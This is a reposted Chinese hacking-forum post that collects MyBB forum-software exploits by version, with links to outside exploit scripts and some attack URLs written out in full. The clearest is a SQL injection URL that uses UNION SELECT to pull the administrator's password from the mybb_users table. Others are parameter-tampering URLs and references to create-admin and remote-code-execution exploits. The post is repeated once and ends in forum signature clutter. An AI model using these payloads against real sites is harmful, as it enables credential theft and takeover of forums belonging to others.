[转载]MYBB Hack
[转载]MYBB HackMyBB <= 1.00 RC4
SQL Injection Exploit
Exploit:
[url=http://milw0rm.org/exploits/1022]http://milw0rm.org/exploits/1022[/url]
[url=http://milw0rm.org/exploits/1172]http://milw0rm.org/exploits/1172[/url]
MyBB 1.0.2
Quote:[url=http://www.strona.com/search.php?s=]http://www.strona.com/search.php?s=[/url][de1aaf9b]&action=do_search&keywords=a&srchtype=3
MyBB 1.03
Quote:[url=http://www.example.com/moderation.php?posts=]http://www.example.com/moderation.php?posts=[/url][pid]|&tid=[pid]&action=do_multimergeposts&sep=hr
MyBB <= 1.04
收集的MYBB 漏洞 BY 混世魔王
Wys?any: 2006-12-04, 21:17 myBB Hack
MyBB <= 1.00 RC4
SQL Injection Exploit
Exploit:
[url=http://milw0rm.org/exploits/1022]http://milw0rm.org/exploits/1022[/url]
[url=http://milw0rm.org/exploits/1172]http://milw0rm.org/exploits/1172[/url]
MyBB 1.0.2
Kod:
[url=http://www.strona.com/search.php?s=]http://www.strona.com/search.php?s=[/url][de1aaf9b]&action=do_search&keywords=a&srchtype=3
MyBB 1.03
Cytat
[url=http://www.example.com/moderation.php?posts=]http://www.example.com/moderation.php?posts=[/url][pid]|&tid=[pid]&action=do_multimergeposts&sep=hr
MyBB <= 1.04
Exploit:
[url=http://www.security.nnov.ru/files/mybbex.pl]http://www.security.nnov.ru/files/mybbex.pl[/url]
MyBB <= 1.1.2
Quote:[url=http://www.strona.com/index.php?referrer=9999999999]http://www.strona.com/index.php?referrer=9999999999'%20UNION%20SELECT%20[/url] password,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,
3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9%20FROM%20mybb_us ers%20WHERE%20uid=1*
remote code execution
Exploit:
[url=http://www.security.nnov.ru/files/mybibi.pl]http://www.security.nnov.ru/files/mybibi.pl[/url]
MyBB <= 1.1.3
Create Admin Exploit
Exploit:
[url=http://milw0rm.org/exploits/1950]http://milw0rm.org/exploits/1950[/url]
MyBB <= 1.1.5
'CLIENT-IP' SQL injection / create new admin exploit
Exploit:
[url=http://www.security.nnov.ru/files/mybbsipsql.php]http://www.security.nnov.ru/files/mybbsipsql.php[/url]取保候审中........
[url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnadd.gif[/img][/url] [url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnchat.gif[/img][/url] [url=http://wpa.qq.com/msgrd?V=1&Uin=26836659&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子181 精华[url=http://forum.eviloctal.com/digest.php?authorid=2648]10[/url] 积分3720 阅读权限100 性别男 在线时间88 小时 注册时间2005-3-12 最后登录2008-6-19 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=2648]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=33339&repquote=144378&extra=page%3D2&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=33339&pid=144378&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=猎头&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]您知道您年薪应是多少?[/url]
[url=http://forum.eviloctal.com/space-uid-66712.html]19830821[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然
页:
[1]